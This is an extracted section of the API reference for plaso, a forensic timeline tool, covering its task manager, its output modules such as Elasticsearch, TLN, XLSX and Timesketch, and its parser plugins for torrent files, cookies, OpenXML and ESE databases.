True if there are tasks that are active, ready to be merged or need to be retried.

Return type bool

RemoveTask(task)Removes an abandoned task.


Raises KeyError – if the task was not abandoned or the task was abandoned and was notretried.

SampleTaskStatus(task, status)Takes a sample of the status of the task for profiling.

Parameters

• task (Task) – a task.

• status (str) – status.

StartProfiling(configuration, identifier)Starts profiling.

Parameters

• configuration (ProfilingConfiguration) – profiling configuration.

• identifier (str) – identifier of the profiling session used to create the sample file-name.

StopProfiling()Stops profiling.

UpdateTaskAsPendingMerge(task)Updates the task manager to reflect that the task is ready to be merged.


Raises KeyError – if the task was not queued, processing or abandoned, or the task was aban-doned and has a retry task.

UpdateTaskAsProcessingByIdentifier(task_identifier)Updates the task manager to reflect the task is processing.



Parameters task_identifier (str) – unique identifier of the task.

Raises KeyError – if the task is not known to the task manager.

plaso.multi_processing.worker_process module

The multi-process worker process.

class plaso.multi_processing.worker_process.WorkerProcess(task_queue, stor-age_writer, collec-tion_filters_helper,knowledge_base,session_identifier, pro-cessing_configuration,**kwargs)

Bases: plaso.multi_processing.base_process.MultiProcessBaseProcess

Class that defines a multi-processing worker process.

SignalAbort()Signals the process to abort.

Module contents

5.1.10 plaso.output package

Submodules

plaso.output.dynamic module

Dynamic selected delimiter separated values output module.

class plaso.output.dynamic.DynamicFieldFormattingHelper(output_mediator)Bases: plaso.output.formatting_helper.FieldFormattingHelper

Dynamic output module field formatting helper.

class plaso.output.dynamic.DynamicOutputModule(output_mediator)Bases: plaso.output.shared_dsv.DSVOutputModule

Dynamic selected delimiter separated values output module.

DESCRIPTION = 'Dynamic selection of fields for a separated value output format.'

NAME = 'dynamic'

plaso.output.elastic module

An output module that saves events to Elasticsearch.

class plaso.output.elastic.ElasticsearchOutputModule(output_mediator)Bases: plaso.output.shared_elastic.SharedElasticsearchOutputModule

Output module for Elasticsearch.

DESCRIPTION = 'Saves the events into an Elasticsearch database.'

NAME = 'elastic'



SetRawFields(raw_fields)Set raw (non-analyzed) fields.

This is used for sorting and aggregations in Elasticsearch. https://www.elastic.co/guide/en/elasticsearch/guide/current/ multi-fields.html

Parameters raw_fields (bool) – True if raw (non-analyzed) fields should be added.

WriteHeader()Connects to the Elasticsearch server and creates the index.

plaso.output.formatting_helper module

Output module field formatting helper.

class plaso.output.formatting_helper.EventFormattingHelper(output_mediator)Bases: object

Output module event formatting helper.

abstract GetFormattedEvent(event, event_data, event_data_stream, event_tag)Retrieves a string representation of the event.

Parameters





Returns string representation of the event.

Return type str

class plaso.output.formatting_helper.FieldFormattingHelper(output_mediator)Bases: object

Output module field formatting helper.

GetFormattedField(field_name, event, event_data, event_data_stream, event_tag)Formats the specified field.

Parameters

• field_name (str) – name of the field.





Returns value of the field.

Return type str


https://www.elastic.co/guide/en/elasticsearch/guide/current/

https://www.elastic.co/guide/en/elasticsearch/guide/current/


plaso.output.interface module

This file contains the output module interface classes.

class plaso.output.interface.LinearOutputModule(output_mediator,event_formatting_helper)

Bases: plaso.output.interface.OutputModule

Linear output module.

Close()Closes the output.

SetOutputWriter(output_writer)Set the output writer.


WriteEventBody(event, event_data, event_data_stream, event_tag)Writes event values to the output.

Parameters





class plaso.output.interface.OutputModule(output_mediator)Bases: object

Output module interface.

Close()Closes the output.

DESCRIPTION = ''

GetMissingArguments()Retrieves arguments required by the module that have not been specified.

Returns

names of argument that are required by the module and have not been specified.


NAME = ''

Open()Opens the output.

WriteEvent(event, event_data, event_data_stream, event_tag)Writes the event to the output.

Parameters







abstract WriteEventBody(event, event_data, event_data_stream, event_tag)Writes event values to the output.

Parameters





WriteEventMACBGroup(event_macb_group)Writes an event MACB group to the output.

An event MACB group is a group of events that have the same timestamp and event data (attributes and val-ues), where the timestamp description (or usage) is one or more of MACB (modification, access, change,birth).

This function is called if the psort engine detected an event MACB group so that the output module,if supported, can represent the group as such. If not overridden this function will output every eventindividually.

Parameters

• (list[tuple[EventObject (event_macb_group) – EventTag]]): group ofevents with identical timestamps, attributes and values.

• EventData – EventTag]]): group of events with identical timestamps, attributes andvalues.

• EventDataStream – EventTag]]): group of events with identical timestamps, attributesand values.

:param [EventTag]]): group of events with identical timestamps, attributes] and values.

WriteFooter()Writes the footer to the output.

Can be used for post-processing or output after the last event is written, such as writing a file footer.

WriteHeader()Writes the header to the output.

Can be used for pre-processing or output before the first event is written, such as writing a file header.

plaso.output.json_line module

Output module that saves data into a JSON line format.

JSON line format is a single JSON entry or event per line instead of grouping all the output into a single JSON entity.

class plaso.output.json_line.JSONLineOutputModule(output_mediator)Bases: plaso.output.interface.LinearOutputModule

Output module for the JSON line format.

DESCRIPTION = 'Saves the events into a JSON line format.'

NAME = 'json_line'




Parameters





plaso.output.json_out module

Output module that saves data into a JSON format.

class plaso.output.json_out.JSONOutputModule(output_mediator)Bases: plaso.output.interface.LinearOutputModule

Output module for the JSON format.

DESCRIPTION = 'Saves the events into a JSON format.'

NAME = 'json'


Parameters







plaso.output.kml module

An output module that writes event with geography data to a KML XML file.

The Keyhole Markup Language (KML) is an XML notation for expressing geographic annotation and visualizationwithin Internet-based, two-dimensional maps and three-dimensional Earth browsers.

class plaso.output.kml.KMLOutputModule(output_mediator)Bases: plaso.output.interface.LinearOutputModule

Output module for a Keyhole Markup Language (KML) XML file.

DESCRIPTION = 'Saves events with geography data into a KML format.'

NAME = 'kml'


Parameters









plaso.output.l2t_csv module

Output module for the log2timeline (L2T) CSV format.

For documentation on the L2T CSV format see: https://forensicswiki.xyz/wiki/index.php?title=L2T_CSV

class plaso.output.l2t_csv.L2TCSVEventFormattingHelper(output_mediator,field_formatting_helper,field_names,field_delimiter=',')

Bases: plaso.output.shared_dsv.DSVEventFormattingHelper

L2T CSV output module event formatting helper.

GetFormattedEventMACBGroup(event_macb_group)Retrieves a string representation of the event.

Parameters





Returns string representation of the event MACB group.

Return type str

class plaso.output.l2t_csv.L2TCSVFieldFormattingHelper(output_mediator)Bases: plaso.output.formatting_helper.FieldFormattingHelper

L2T CSV output module field formatting helper.

class plaso.output.l2t_csv.L2TCSVOutputModule(output_mediator)Bases: plaso.output.interface.LinearOutputModule

CSV format used by log2timeline, with 17 fixed fields.

DESCRIPTION = 'CSV format used by legacy log2timeline, with 17 fixed fields.'

NAME = 'l2tcsv'

WriteEventMACBGroup(event_macb_group)Writes an event MACB group to the output.


https://forensicswiki.xyz/wiki/index.php?title=L2T_CSV


Parameters






plaso.output.logger module

The output sub module logger.

plaso.output.manager module

Output plugin manager.

class plaso.output.manager.OutputManagerBases: object

Output module manager.

classmethod DeregisterOutput(output_class)Deregisters an output class.

The output classes are identified based on their NAME attribute.

Parameters output_class (type) – output module class.

Raises KeyError – if output class is not set for the corresponding data type.

classmethod GetDisabledOutputClasses()Retrieves the disabled output classes and its associated name.

Yields tuple[str, type] – output module name and class.

classmethod GetOutputClass(name)Retrieves the output class for a specific name.

Parameters name (str) – name of the output module.

Returns output module class.

Return type type

Raises

• KeyError – if there is no output class found with the supplied name.

• ValueError – if name is not a string.

classmethod GetOutputClasses()Retrieves the available output classes its associated name.

Yields tuple[str, type] – output class name and type object.



classmethod HasOutputClass(name)Determines if a specific output class is registered with the manager.


Returns True if the output class is registered.

Return type bool

classmethod IsLinearOutputModule(name)Determines if a specific output class is a linear output module.


Returns if the output module is linear.

Return type True

classmethod NewOutputModule(name, output_mediator)Creates a new output module object for the specified output format.

Parameters

• name (str) – name of the output module.

• output_mediator (OutputMediator) – output mediator.

Returns output module.

Return type OutputModule

Raises

• KeyError – if there is no output class found with the supplied name.

• ValueError – if name is not a string.

classmethod RegisterOutput(output_class, disabled=False)Registers an output class.


Parameters

• output_class (type) – output module class.

• disabled (Optional[bool]) – True if the output module is disabled due to themodule not loading correctly or not.

Raises KeyError – if output class is already set for the corresponding name.

classmethod RegisterOutputs(output_classes, disabled=False)Registers output classes.


Parameters

• output_classes (list[type]) – output module classes.

• disabled (Optional[bool]) – True if the output module is disabled due to themodule not loading correctly or not.

Raises KeyError – if output class is already set for the corresponding name.



plaso.output.mediator module

The output mediator object.

class plaso.output.mediator.OutputMediator(knowledge_base, format-ter_mediator, data_location=None,preferred_encoding='utf-8')

Bases: object

Output mediator.

data_locationpath of the formatter data files.

Type Optional[str]




Return type str

GetEventFormatter(event_data)Retrieves the event formatter for a specific event data type.


Returns event formatter or None.

Return type EventFormatter

GetFormattedMessages(event_data)Retrieves the formatted messages related to the event data.


Returns

containing:

str: full message string or None if no event formatter was found. str: short messagestring or None if no event formatter was found.

Return type tuple

GetHostname(event_data, default_hostname='-')Retrieves the hostname related to the event.

Parameters


• default_hostname (Optional[str]) – default hostname.

Returns hostname.

Return type str

GetMACBRepresentation(event, event_data)Retrieves the MACB representation.

Parameters





Returns MACB representation.

Return type str

GetMACBRepresentationFromDescriptions(timestamp_descriptions)Determines the MACB representation from the timestamp descriptions.

MACB representation is a shorthand for representing one or more of modification, access, change, birthtimestamp descriptions as the letters “MACB” or a “.” if the corresponding timestamp is not set.

Note that this is an output format shorthand and does not guarantee that the timestamps represent the sameoccurrence.

Parameters timestamp_descriptions (list[str]) – timestamp descriptions, whichare defined in definitions.TIME_DESCRIPTIONS.

Returns MACB representation.

Return type str

GetRelativePathForPathSpec(path_spec)Retrieves the relative path for a path specification.


Returns relateive path of the path specification.

Return type str

GetStoredHostname()Retrieves the stored hostname.

Returns hostname.

Return type str

GetUsername(event_data, default_username='-')Retrieves the username related to the event.

Parameters


• default_username (Optional[str]) – default username.

Returns username.

Return type str

SetTimezone(timezone)Sets the timezone.

Parameters timezone (str) – timezone.

Raises ValueError – if the timezone is not supported.

property encodingpreferred encoding.

Type str

property timezoneThe timezone.



plaso.output.null module

Null device output module.

class plaso.output.null.NullOutputModule(output_mediator)Bases: plaso.output.interface.OutputModule

Null device output module.

DESCRIPTION = 'Output module that does not output anything.'

NAME = 'null'


Parameters





plaso.output.rawpy module

Output module for the native (or “raw”) Python format.

class plaso.output.rawpy.NativePythonEventFormattingHelper(output_mediator)Bases: plaso.output.formatting_helper.EventFormattingHelper

Native (or “raw”) Python output module event formatting helper.

GetFormattedEvent(event, event_data, event_data_stream, event_tag)Retrieves a string representation of the event.

Parameters






Return type str

class plaso.output.rawpy.NativePythonOutputModule(output_mediator)Bases: plaso.output.interface.LinearOutputModule

Output module for native (or “raw”) Python output format.

DESCRIPTION = 'native (or "raw") Python output.'

NAME = 'rawpy'



plaso.output.shared_dsv module

Shared functionality for delimiter separated values output modules.

class plaso.output.shared_dsv.DSVEventFormattingHelper(output_mediator,field_formatting_helper,field_names,field_delimiter=',')

Bases: plaso.output.formatting_helper.EventFormattingHelper

Delimiter separated values output module event formatting helper.


Parameters






Return type str

GetFormattedFieldNames()Retrieves a string representation of the field names.

Returns string representation of the field names.

Return type str

SetFieldDelimiter(field_delimiter)Sets the field delimiter.

Parameters field_delimiter (str) – field delimiter.

SetFields(field_names)Sets the names of the fields to output.

Parameters field_names (list[str]) – names of the fields to output.

class plaso.output.shared_dsv.DSVOutputModule(output_mediator, field_formatting_helper,names, delimiter=',', header=None)

Bases: plaso.output.interface.LinearOutputModule

Shared functionality for delimiter separated values output modules.

SetFieldDelimiter(field_delimiter)Sets the field delimiter.

Parameters field_delimiter (str) – field delimiter.

SetFields(field_names)Sets the names of the fields to output.

Parameters field_names (list[str]) – names of the fields to output.




plaso.output.shared_elastic module

Shared functionality for Elasticsearch output modules.

class plaso.output.shared_elastic.SharedElasticsearchFieldFormattingHelper(output_mediator)Bases: plaso.output.formatting_helper.FieldFormattingHelper

Shared Elasticsearch output module field formatting helper.

GetFormattedField(field_name, event, event_data, event_data_stream, event_tag)Formats the specified field.

Parameters

• field_name (str) – name of the field.





Returns value of the field or None if not set.

Return type object

class plaso.output.shared_elastic.SharedElasticsearchOutputModule(output_mediator)Bases: plaso.output.interface.OutputModule

Shared functionality for an Elasticsearch output module.

Close()Closes connection to Elasticsearch.

Inserts any remaining buffered event documents.

NAME = 'elastic_shared'

SetCACertificatesPath(ca_certificates_path)Sets the path to the CA certificates.

Parameters ca_certificates_path (str) – path to file containing a list of root certifi-cates to trust.

Raises BadConfigOption – if the CA certificates file does not exist.

SetDocumentType(document_type)Sets the document type.

Parameters document_type (str) – document type.

SetFlushInterval(flush_interval)Set the flush interval.

Parameters flush_interval (int) – number of events to buffer before doing a bulk insert.

SetIndexName(index_name)Set the index name.

Parameters index_name (str) – name of the index.

SetPassword(password)Set the password.

Parameters password (str) – password to authenticate with.



SetServerInformation(server, port)Set the server information.

Parameters

• server (str) – IP address or hostname of the server.

• port (int) – Port number of the server.

SetURLPrefix(url_prefix)Sets the URL prefix.

Parameters url_prefix (str) – URL prefix.

SetUseSSL(use_ssl)Sets the use of ssl.

Parameters use_ssl (bool) – enforces use of ssl.

SetUsername(username)Sets the username.

Parameters username (str) – username to authenticate with.


Parameters





plaso.output.shared_json module

Shared functionality for JSON based output modules.

class plaso.output.shared_json.JSONEventFormattingHelper(output_mediator)Bases: plaso.output.formatting_helper.EventFormattingHelper

JSON output module event formatting helper.


Parameters






Return type str



plaso.output.timesketch_out module

Timesketch output module.

class plaso.output.timesketch_out.TimesketchOutputModule(output_mediator)Bases: plaso.output.shared_elastic.SharedElasticsearchOutputModule

Output module for Timesketch.

Close()Closes the connection to TimeSketch Elasticsearch database.

Sends the remaining events for indexing and removes the processing status on the Timesketch search indexobject.

DESCRIPTION = 'Create a Timesketch timeline.'

GetMissingArguments()Retrieves a list of arguments that are missing from the input.

Returns

names of arguments that are required by the module and have not been specified.


NAME = 'timesketch'

SetTimelineName(timeline_name)Sets the timeline name.

Parameters timeline_name (str) – timeline name.

SetTimelineOwner(username)Sets the username of the user that should own the timeline.

Parameters username (str) – username.

WriteHeader()Sets up the Elasticsearch index and the Timesketch database object.

Creates the Elasticsearch index with Timesketch specific settings and the Timesketch SearchIndex databaseobject.

plaso.output.tln module

Output module for the TLN format.

For documentation on the TLN format see: https://forensicswiki.xyz/wiki/index.php?title=TLN

class plaso.output.tln.L2TTLNOutputModule(output_mediator)Bases: plaso.output.shared_dsv.DSVOutputModule

Output module for the log2timeline extended variant of the TLN format.

l2tTLN is an extended variant of TLN introduced log2timeline 0.65.

l2tTLN extends basic TLN to 7 | separated fields, namely: * Time - 32-bit POSIX (or Unix) epoch timestamp.* Source - The name of the parser or plugin that produced the event. * Host - The source host system. * User- The user associated with the data. * Description - Message string describing the data. * TZ - L2T 0.65 field.Timezone of the event. * Notes - L2T 0.65 field. Optional notes field or filename and inode.

DESCRIPTION = 'Extended TLN 7 field | delimited output.'

NAME = 'l2ttln'


https://forensicswiki.xyz/wiki/index.php?title=TLN


class plaso.output.tln.TLNFieldFormattingHelper(output_mediator)Bases: plaso.output.formatting_helper.FieldFormattingHelper

TLN output module field formatting helper.

class plaso.output.tln.TLNOutputModule(output_mediator)Bases: plaso.output.shared_dsv.DSVOutputModule

Output module for the TLN format.

TLN defines 5 | separated fields, namely: * Time - 32-bit POSIX (or Unix) epoch timestamp. * Source - Thename of the parser or plugin that produced the event. * Host - The source host system. * User - The userassociated with the data. * Description - Message string describing the data.

DESCRIPTION = 'TLN 5 field | delimited output.'

NAME = 'tln'

plaso.output.xlsx module

Output module for the Excel Spreadsheet (XLSX) output format.

class plaso.output.xlsx.XLSXOutputModule(output_mediator)Bases: plaso.output.interface.OutputModule

Output module for the Excel Spreadsheet (XLSX) output format.

Close()Closes the workbook.

DESCRIPTION = 'Excel Spreadsheet (XLSX) output'

NAME = 'xlsx'

Open()Creates a new workbook.

Raises

• IOError – if the specified output file already exists.

• OSError – if the specified output file already exists.

• ValueError – if the filename is not set.

SetFields(fields)Sets the fields to output.

Parameters fields (list[str]) – names of the fields to output.

SetFilename(filename)Sets the filename.

Parameters filename (str) – filename.

SetTimestampFormat(timestamp_format)Set the timestamp format to use for the datetime column.

Parameters timestamp_format (str) – format string of date and time values.


Parameters







WriteHeader()Writes the header to the spreadsheet.

Module contents

This file imports Python modules that register output modules.

5.1.11 plaso.parsers package

Subpackages

plaso.parsers.bencode_plugins package

Submodules

plaso.parsers.bencode_plugins.interface module

Bencode parser plugin interface.

BencodePlugin defines the attributes necessary for registration, discovery and operation of plugins for bencoded fileswhich will be used by BencodeParser.

class plaso.parsers.bencode_plugins.interface.BencodePluginBases: plaso.parsers.plugins.BasePlugin

Bencode parser plugin interface.

BENCODE_KEYS = frozenset({'any'})

DATA_FORMAT = 'Bencoded file'

NAME = 'bencode_plugin'

abstract Process(parser_mediator, decoded_values=None, **kwargs)Extracts events from the values of entries within a bencoded file.

This is the main method that a Bencode plugin needs to implement.

The contents of the bencode keys defined in BENCODE_KEYS can be made available to the plugin asboth a matched{‘KEY’: ‘value’} and as the entire bencoded data dictionary. The plugin should implementlogic to parse the most relevant data set into a useful event for incorporation into the Plaso timeline.

The attributes for a BencodeEvent should include the following: root = Root key this event was ex-tracted from. key = Key the value resided in. time = Date this artifact was created in micro seconds(usec) from

January 1, 1970 00:00:00 UTC.

desc = Short description.

Parameters



• parser_mediator (ParserMediator) – mediates interactions between parsers andother components, such as storage and dfvfs.

• decoded_values (Optional[collections.OrderedDict[bytes|str,object]]) – decoded values.

URLS = []

plaso.parsers.bencode_plugins.transmission module

Bencode parser plugin for Transmission BitTorrent files.

class plaso.parsers.bencode_plugins.transmission.TransmissionEventDataBases: plaso.containers.events.EventData

Transmission BitTorrent event data.

destinationpath of the downloaded file.

Type str

seedtimeclient seed time in number of minutes.

Type int

DATA_TYPE = 'p2p:bittorrent:transmission'

class plaso.parsers.bencode_plugins.transmission.TransmissionPluginBases: plaso.parsers.bencode_plugins.interface.BencodePlugin

Parse Transmission BitTorrent activity file for current torrents.

Transmission stores an individual Bencoded file for each active download in a folder named resume under theuser’s application data folder.

BENCODE_KEYS = frozenset({'activity-date', 'added-date', 'destination', 'done-date', 'seeding-time-seconds'})

DATA_FORMAT = 'Transmission BitTorrent activity file'

NAME = 'bencode_transmission'

Process(parser_mediator, decoded_values=None, **kwargs)Extracts events from Transmission’s resume folder files.

Parameters





plaso.parsers.bencode_plugins.utorrent module

Bencode parser plugin for uTorrent active torrent files.

class plaso.parsers.bencode_plugins.utorrent.UTorrentEventDataBases: plaso.containers.events.EventData

uTorrent active torrent event data.

captionofficial name of package.

Type str

destinationpath of the downloaded file.

Type str

seedtimeclient seed time in number of minutes.

Type int

DATA_TYPE = 'p2p:bittorrent:utorrent'

class plaso.parsers.bencode_plugins.utorrent.UTorrentPluginBases: plaso.parsers.bencode_plugins.interface.BencodePlugin

Plugin to extract parse uTorrent active torrent files.

uTorrent creates a file, resume.dat, and a backup, resume.dat.old, to for all active torrents. This is typicallystored in the user’s application data folder.

These files, at a minimum, contain a ‘.fileguard’ key and a dictionary with a key name for a particular downloadwith a ‘.torrent’ file extension.

BENCODE_KEYS = frozenset({'.fileguard'})

DATA_FORMAT = 'uTorrent active torrent file'

NAME = 'bencode_utorrent'

Process(parser_mediator, decoded_values=None, **kwargs)Extracts events from uTorrent active torrent files.

Parameters





Module contents

Imports for the bencode parser.

plaso.parsers.cookie_plugins package

Submodules

plaso.parsers.cookie_plugins.ganalytics module

This file contains a plugin for parsing Google Analytics cookies.

class plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsEventData(cookie_identifier)Bases: plaso.containers.events.EventData

Google Analytics event data.

cookie_namename of cookie.

Type str

domain_hashdomain hash.

Type str

pages_viewednumber of pages viewed.

Type int

sessionsnumber of sessions.

Type int

sourcesnumber of sources.

Type int

urlURL or path where the cookie got set.

Type str

visitor_idvisitor identifier.

Type str

DATA_TYPE = 'cookie:google:analytics'

class plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsUtmaPluginBases: plaso.parsers.cookie_plugins.interface.BaseCookiePlugin

A browser cookie plugin for __utma Google Analytics cookies.

The structure of the cookie data: <domain hash>.<visitor ID>.<first visit>.<previous visit>.<last visit>. <num-ber of sessions>



For example: 137167072.1215918423.1383170166.1383170166.1383170166.1

Or: <last visit>

For example: 13113225820000000

COOKIE_NAME = '__utma'

DATA_FORMAT = 'Google Analytics __utma cookie'

GetEntries(parser_mediator, cookie_data=None, url=None, **kwargs)Extracts event objects from the cookie.

Parameters


• cookie_data (str) – cookie data.

• url (str) – URL or path where the cookie got set.

NAME = 'google_analytics_utma'

URLS = ['http://www.dfinews.com/articles/2012/02/google-analytics-cookies-and-forensic-implications']

class plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsUtmbPluginBases: plaso.parsers.cookie_plugins.interface.BaseCookiePlugin

A browser cookie plugin for __utmb Google Analytics cookies.

The structure of the cookie data: <domain hash>.<pages viewed>.<unknown>.<last time>

For example: 137167072.1.10.1383170166 173272373.6.8.1440489514899 173272373.4.9.1373300660574

Or: <last time>

For example: 13113225820000000

COOKIE_NAME = '__utmb'

DATA_FORMAT = 'Google Analytics __utmb cookie'


Parameters


• cookie_data (bytes) – cookie data.


NAME = 'google_analytics_utmb'


class plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsUtmtPluginBases: plaso.parsers.cookie_plugins.interface.BaseCookiePlugin

A browser cookie plugin for __utmt Google Analytics cookies.

The structure of the cookie data: <last time>

For example: 13113215173000000

COOKIE_NAME = '__utmt'

DATA_FORMAT = 'Google Analytics __utmt cookie'




Parameters


• cookie_data (bytes) – cookie data.


NAME = 'google_analytics_utmt'

class plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsUtmzPluginBases: plaso.parsers.cookie_plugins.interface.BaseCookiePlugin

A browser cookie plugin for __utmz Google Analytics cookies.

The structure of the cookie data: <domain hash>.<last time>.<sessions>.<sources>.<variables>

For example: 207318870.1383170190.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic| utm-ctr=(not%20provided)

Or: <last time>

For example: 13128990382000000

COOKIE_NAME = '__utmz'

DATA_FORMAT = 'Google Analytics __utmz cookie'


Parameters


• cookie_data (str) – cookie data.


NAME = 'google_analytics_utmz'


plaso.parsers.cookie_plugins.interface module

This file contains an interface for browser cookie plugins.

class plaso.parsers.cookie_plugins.interface.BaseCookiePluginBases: plaso.parsers.plugins.BasePlugin

A browser cookie plugin for Plaso.

This is a generic cookie parsing interface that can handle parsing cookies from all browsers.

COOKIE_NAME = ''

DATA_FORMAT = 'Browser cookie data'

abstract GetEntries(parser_mediator, cookie_data=None, url=None, **kwargs)Extract and return EventObjects from the data structure.

Parameters




• cookie_data (Optional[bytes]) – cookie data, as a byte sequence.

• url (Optional[str]) – URL or path where the cookie was set.

NAME = 'cookie_plugin'

Process(parser_mediator, cookie_name, cookie_data, url, **kwargs)Determine if this is the right plugin for this cookie.

Parameters


• cookie_name (str) – the name of the cookie value.

• cookie_data (bytes) – the cookie data, as a byte sequence.

• url (str) – the full URL or path where the cookie was set.

Raises

• errors.WrongPlugin – If the cookie name differs from the one supplied inCOOKIE_NAME.

• ValueError – If cookie_name or cookie_data are not set.

plaso.parsers.cookie_plugins.manager module

The cookie plugins manager object.

class plaso.parsers.cookie_plugins.manager.CookiePluginsManagerBases: object

Class that implements the cookie plugins manager.

classmethod DeregisterPlugin(plugin_class)Deregisters a plugin class.

The plugin classes are identified based on their lower case name.

Parameters plugin_class (type) – the class object of the plugin.

Raises KeyError – if plugin class is not set for the corresponding name.

classmethod GetPlugins()Retrieves the cookie plugins.

Returns list of all cookie plugin objects.

Return type list[type]

classmethod RegisterPlugin(plugin_class)Registers a plugin class.


Parameters plugin_class (type) – the class object of the plugin.

Raises KeyError – if plugin class is already set for the corresponding name.



classmethod RegisterPlugins(plugin_classes)Registers plugin classes.


Parameters plugin_classes (list[type]) – a list of class objects of the plugins.


Module contents

Imports for the cookies parser.

plaso.parsers.czip_plugins package

Submodules

plaso.parsers.czip_plugins.interface module

Interface for compound ZIP file plugins.

class plaso.parsers.czip_plugins.interface.CompoundZIPPluginBases: plaso.parsers.plugins.BasePlugin

Compound ZIP parser plugin.

DATA_FORMAT = 'Compound ZIP file'

abstract InspectZipFile(parser_mediator, zip_file)Inspects a compound ZIP file and produces events.

This is the main method that a compound ZIP plugin needs to implement.

Parameters


• zip_file (zipfile.ZipFile) – the ZIP file. It should not be closed in this method,but will be closed by the parser logic in czip.py.

NAME = 'czip_plugin'

Process(parser_mediator, zip_file, archive_members)Determines if this is the correct plugin; if so proceed with processing.

This method checks if the ZIP file being contains the paths specified in REQUIRED_PATHS. If all pathsare present, the plugin logic processing continues in InspectZipFile.

Parameters


• zip_file (zipfile.ZipFile) – the ZIP file. It should not be closed in this method,but will be closed by the parser logic in czip.py.

• archive_members (list[str]) – file paths in the archive.

Raises



• UnableToParseFile – when the file cannot be parsed.

• ValueError – if a subclass has not specified REQUIRED_PATHS.

• WrongCompoundZIPPlugin – If this plugin is not able to process the given file.

REQUIRED_PATHS = frozenset({})

plaso.parsers.czip_plugins.oxml module

Compound ZIP parser plugin for OpenXML files.

class plaso.parsers.czip_plugins.oxml.OpenXMLEventDataBases: plaso.containers.events.EventData

OXML event data.

app_versionversion of application that created document.

Type str

authorname of author.

Type str

creating_appname of application that created document.

Type str

doc_security???

Type str

hyperlinks_changedTrue if hyperlinks have changed.

Type bool

i4???

Type str

last_saved_byname of user that last saved the document.

Type str

links_up_to_dateTrue if the links are up to date.

Type bool

number_of_charactersnumber of characters without spaces in the document.

Type int

number_of_characters_with_spacesnumber of characters including spaces in the document.



Type int

number_of_linesnumber of lines in the document.

Type int

number_of_pagesnumber of pages in the document.

Type int

number_of_paragraphsnumber of paragraphs in the document.

Type int

number_of_wordsnumber of words in the document.

Type int

revision_numberrevision number.

Type int

scale_cropTrue if crop to scale is enabled.

Type bool

shared_docTrue if document is shared.

Type bool

templatename of template ???

Type str

total_time???

Type str

DATA_TYPE = 'metadata:openxml'

class plaso.parsers.czip_plugins.oxml.OpenXMLPluginBases: plaso.parsers.czip_plugins.interface.CompoundZIPPlugin

Parse metadata from OXML files.

DATA_FORMAT = 'OpenXML (OXML) file'

InspectZipFile(parser_mediator, zip_file)Parses an OXML file-like object.

Parameters


• zip_file (zipfile.ZipFile) – the zip file containing OXML content. It is not beclosed in this method, but will be closed by the parser logic



in czip.py.

Raises UnableToParseFile – when the file cannot be parsed.

NAME = 'oxml'

REQUIRED_PATHS = frozenset({'[Content_Types].xml', '_rels/.rels', 'docProps/core.xml'})

Module contents

Imports for the compound ZIP parser.

plaso.parsers.esedb_plugins package

Submodules

plaso.parsers.esedb_plugins.file_history module

Parser for the Microsoft File History ESE database.

class plaso.parsers.esedb_plugins.file_history.FileHistoryESEDBPluginBases: plaso.parsers.esedb_plugins.interface.ESEDBPlugin

Parses a File History ESE database file.

DATA_FORMAT = 'Windows 8 File History ESE database file'

NAME = 'file_history'

ParseNameSpace(parser_mediator, cache=None, database=None, table=None, **unused_kwargs)Parses the namespace table.

Parameters


• cache (Optional[ESEDBCache]) – cache.

• database (Optional[pyesedb.file]) – ESE database.

• table (Optional[pyesedb.table]) – table.

Raises ValueError – if the database or table value is missing.

REQUIRED_TABLES = {'backupset': '', 'file': '', 'library': '', 'namespace': 'ParseNameSpace'}

class plaso.parsers.esedb_plugins.file_history.FileHistoryNamespaceEventDataBases: plaso.containers.events.EventData

File history namespace table event data.

file_attributefile attribute.

Type int

identifieridentifier.

Type str



original_filenameoriginal file name.

Type str

parent_identifierparent identifier.

Type str

usn_numberUSN number.

Type int

DATA_TYPE = 'file_history:namespace:event'

plaso.parsers.esedb_plugins.interface module

This file contains the interface for ESE database plugins.

class plaso.parsers.esedb_plugins.interface.ESEDBPluginBases: plaso.parsers.plugins.BasePlugin

The ESE database plugin interface.

BINARY_DATA_COLUMN_TYPES = frozenset({pyesedb.column_types.BINARY_DATA, pyesedb.column_types.LARGE_BINARY_DATA})

DATA_FORMAT = 'ESE database file'

FLOATING_POINT_COLUMN_TYPES = frozenset({pyesedb.column_types.FLOAT_32BIT, pyesedb.column_types.DOUBLE_64BIT})

GetEntries(parser_mediator, cache=None, database=None, **kwargs)Extracts event objects from the database.

Parameters




Raises ValueError – If the database attribute is not valid.

INTEGER_COLUMN_TYPES = frozenset({pyesedb.column_types.CURRENCY, pyesedb.column_types.INTEGER_16BIT_SIGNED, pyesedb.column_types.INTEGER_32BIT_UNSIGNED, pyesedb.column_types.DATE_TIME, pyesedb.column_types.INTEGER_16BIT_UNSIGNED, pyesedb.column_types.INTEGER_64BIT_SIGNED, pyesedb.column_types.INTEGER_8BIT_UNSIGNED, pyesedb.column_types.INTEGER_32BIT_SIGNED})

NAME = 'esedb_plugin'

OPTIONAL_TABLES = {}

Process(parser_mediator, cache=None, database=None, **kwargs)Determines if this is the appropriate plugin for the database.

Parameters




Raises ValueError – If the database attribute is not valid.



REQUIRED_TABLES = {}

STRING_COLUMN_TYPES = frozenset({pyesedb.column_types.TEXT, pyesedb.column_types.LARGE_TEXT})

property required_tablesrequired table names.

Type set[str]

plaso.parsers.esedb_plugins.msie_webcache module

Parser for the Microsoft Internet Explorer WebCache ESE database.

The WebCache database (WebCacheV01.dat or WebCacheV24.dat) are used by MSIE as of version 10.

class plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainerEventDataBases: plaso.containers.events.EventData

MSIE WebCache Container table event data.

access_countaccess count.

Type int

cached_filenamename of the cached file.

Type str

cached_file_sizesize of the cached file.

Type int

cache_identifiercache identifier.

Type int

container_identifiercontainer identifier.

Type int

entry_identifierentry identifier.

Type int

file_extensionfile extension.

Type str

redirect_urlURL from which the request was redirected.

Type str

request_headersrequest headers.

Type str



response_headersresponse headers.

Type str

sync_countsync count.

Type int

urlURL.

Type str

DATA_TYPE = 'msie:webcache:container'

class plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainersEventDataBases: plaso.containers.events.EventData

MSIE WebCache Containers table event data.

container_identifiercontainer identifier.

Type int

directoryname of the cache directory.

Type str

namename of the cache container.

Type str

